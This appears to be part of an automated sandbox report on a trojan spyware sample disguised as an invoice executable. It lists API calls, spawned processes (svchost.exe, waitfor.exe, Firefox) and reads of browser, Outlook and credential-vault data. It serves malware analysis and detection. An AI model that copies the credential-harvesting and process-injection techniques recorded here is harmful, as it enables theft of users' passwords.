                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeCode function: 0_2_002BA1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_002BA1EF
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeCode function: 0_2_002A8310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_002A8310
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeCode function: 0_2_002B51BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_002B51BD
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeCode function: 0_2_0027D9750_2_0027D975
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeCode function: 0_2_0025FCE00_2_0025FCE0
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeCode function: 0_2_002721C50_2_002721C5
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeCode function: 0_2_002862D20_2_002862D2
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeCode function: 0_2_002D03DA0_2_002D03DA
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeCode function: 0_2_0028242E0_2_0028242E
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeCode function: 0_2_002725FA0_2_002725FA
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeCode function: 0_2_002AE6160_2_002AE616
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeCode function: 0_2_0025E6A00_2_0025E6A0
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeCode function: 0_2_002666E10_2_002666E1
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeCode function: 0_2_0028878F0_2_0028878F
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeCode function: 0_2_002688080_2_00268808
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeCode function: 0_2_002868440_2_00286844
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeCode function: 0_2_002D08570_2_002D0857
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeCode function: 0_2_002B88890_2_002B8889
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeCode function: 0_2_0027CB210_2_0027CB21
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeCode function: 0_2_00286DB60_2_00286DB6
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeCode function: 0_2_00266F9E0_2_00266F9E
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeCode function: 0_2_002630300_2_00263030
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeCode function: 0_2_002731870_2_00273187
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeCode function: 0_2_0027F1D90_2_0027F1D9
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeCode function: 0_2_002512870_2_00251287
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeCode function: 0_2_002714840_2_00271484
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeCode function: 0_2_002655200_2_00265520
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeCode function: 0_2_002776960_2_00277696
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeCode function: 0_2_002657600_2_00265760
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeCode function: 0_2_002719780_2_00271978
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeCode function: 0_2_00289AB50_2_00289AB5
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeCode function: 0_2_0027BDA60_2_0027BDA6
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeCode function: 0_2_00271D900_2_00271D90
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeCode function: 0_2_002D7DDB0_2_002D7DDB
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeCode function: 0_2_0025DF000_2_0025DF00
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeCode function: 0_2_00263FE00_2_00263FE0
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeCode function: 0_2_00C534C80_2_00C534C8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00418ED32_2_00418ED3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004170DE2_2_004170DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004170E32_2_004170E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E9032_2_0040E903
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004109132_2_00410913
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004049242_2_00404924
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004011F02_2_004011F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040EA472_2_0040EA47
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040EA532_2_0040EA53
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004033002_2_00403300
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401CC02_2_00401CC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401CB92_2_00401CB9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042F5C32_2_0042F5C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401E202_2_00401E20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004026232_2_00402623
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004026302_2_00402630
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004106ED2_2_004106ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004106F32_2_004106F3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033FA3522_2_033FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034003E62_2_034003E6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334E3F02_2_0334E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E02742_2_033E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C02C02_2_033C02C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DA1182_2_033DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033301002_2_03330100
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C81582_2_033C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034001AA2_2_034001AA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F81CC2_2_033F81CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D20002_2_033D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033407702_2_03340770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033647502_2_03364750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333C7C02_2_0333C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335C6E02_2_0335C6E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033405352_2_03340535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034005912_2_03400591
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E44202_2_033E4420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F24462_2_033F2446
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033EE4F62_2_033EE4F6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033FAB402_2_033FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F6BD72_2_033F6BD7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333EA802_2_0333EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033569622_2_03356962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033429A02_2_033429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0340A9A62_2_0340A9A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334A8402_2_0334A840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033428402_2_03342840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033268B82_2_033268B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336E8F02_2_0336E8F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03360F302_2_03360F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E2F302_2_033E2F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03382F282_2_03382F28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B4F402_2_033B4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033BEFA02_2_033BEFA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334CFE02_2_0334CFE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03332FC82_2_03332FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033FEE262_2_033FEE26
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340E592_2_03340E59
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03352E902_2_03352E90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033FCE932_2_033FCE93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033FEEDB2_2_033FEEDB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DCD1F2_2_033DCD1F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334AD002_2_0334AD00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03358DBF2_2_03358DBF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333ADE02_2_0333ADE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340C002_2_03340C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E0CB52_2_033E0CB5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03330CF22_2_03330CF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F132D2_2_033F132D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332D34C2_2_0332D34C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0338739A2_2_0338739A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033452A02_2_033452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E12ED2_2_033E12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335B2C02_2_0335B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0340B16B2_2_0340B16B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332F1722_2_0332F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0337516C2_2_0337516C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334B1B02_2_0334B1B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F70E92_2_033F70E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033FF0E02_2_033FF0E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033EF0CC2_2_033EF0CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033470C02_2_033470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033FF7B02_2_033FF7B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F16CC2_2_033F16CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F75712_2_033F7571
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DD5B02_2_033DD5B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033FF43F2_2_033FF43F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033314602_2_03331460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033FFB762_2_033FFB76
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335FB802_2_0335FB80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B5BF02_2_033B5BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0337DBF92_2_0337DBF9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B3A6C2_2_033B3A6C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033FFA492_2_033FFA49
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F7A462_2_033F7A46
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DDAAC2_2_033DDAAC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03385AA02_2_03385AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E1AA32_2_033E1AA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033EDAC62_2_033EDAC6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D59102_2_033D5910
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033499502_2_03349950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335B9502_2_0335B950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AD8002_2_033AD800
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033438E02_2_033438E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033FFF092_2_033FFF09
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033FFFB12_2_033FFFB1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03341F922_2_03341F92
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03349EB02_2_03349EB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F7D732_2_033F7D73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F1D5A2_2_033F1D5A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03343D402_2_03343D40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335FDC02_2_0335FDC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B9C322_2_033B9C32
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033FFCF22_2_033FFCF2
                Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exeCode function: 4_2_032BAB1D4_2_032BAB1D
                Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exeCode function: 4_2_032BAB174_2_032BAB17
                Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exeCode function: 4_2_032C32CB4_2_032C32CB
                Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exeCode function: 4_2_032D99ED4_2_032D99ED
                Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exeCode function: 4_2_032B8E7D4_2_032B8E7D
                Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exeCode function: 4_2_032B8E714_2_032B8E71
                Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exeCode function: 4_2_032B8D2D4_2_032B8D2D
                Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exeCode function: 4_2_032BAD3D4_2_032BAD3D
                Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exeCode function: 4_2_032C150D4_2_032C150D
                Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exeCode function: 4_2_032C15084_2_032C1508
                Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exeCode function: 4_2_032AED4E4_2_032AED4E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0332B970 appears 280 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 033BF290 appears 105 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03375130 appears 58 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 033AEA12 appears 86 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03387E54 appears 102 times
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeCode function: String function: 00257DE1 appears 35 times
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeCode function: String function: 00278900 appears 42 times
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeCode function: String function: 00270AE3 appears 70 times
                Source: Proforma invoice - Arancia NZ.exe, 00000000.00000003.2010779608.00000000036B3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Proforma invoice - Arancia NZ.exe
                Source: Proforma invoice - Arancia NZ.exe, 00000000.00000003.2011244293.000000000385D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Proforma invoice - Arancia NZ.exe
                Source: Proforma invoice - Arancia NZ.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/3@16/13
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeCode function: 0_2_002BA06A GetLastError,FormatMessageW,0_2_002BA06A
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeCode function: 0_2_002A81CB AdjustTokenPrivileges,CloseHandle,0_2_002A81CB
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeCode function: 0_2_002A87E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_002A87E1
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeCode function: 0_2_002BB333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_002BB333
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeCode function: 0_2_002CEE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_002CEE0D
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeCode function: 0_2_002C83BB CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,0_2_002C83BB
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeCode function: 0_2_00254E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00254E89
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeFile created: C:\Users\user\AppData\Local\Temp\aut4E08.tmpJump to behavior
                Source: Proforma invoice - Arancia NZ.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: waitfor.exe, 00000005.00000002.4468568240.0000000000AC2000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000005.00000003.2489326595.0000000000ACB000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4468568240.0000000000AEE000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4468568240.0000000000AA0000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000005.00000003.2487075375.0000000000AC2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: Proforma invoice - Arancia NZ.exeReversingLabs: Detection: 47%
                Source: unknownProcess created: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe "C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe"
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe"
                Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exeProcess created: C:\Windows\SysWOW64\waitfor.exe "C:\Windows\SysWOW64\waitfor.exe"
                Source: C:\Windows\SysWOW64\waitfor.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe"Jump to behavior
                Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exeProcess created: C:\Windows\SysWOW64\waitfor.exe "C:\Windows\SysWOW64\waitfor.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: Proforma invoice - Arancia NZ.exeStatic file information: File size 1207808 > 1048576
                Source: Proforma invoice - Arancia NZ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: Proforma invoice - Arancia NZ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: Proforma invoice - Arancia NZ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: Proforma invoice - Arancia NZ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Proforma invoice - Arancia NZ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: Proforma invoice - Arancia NZ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
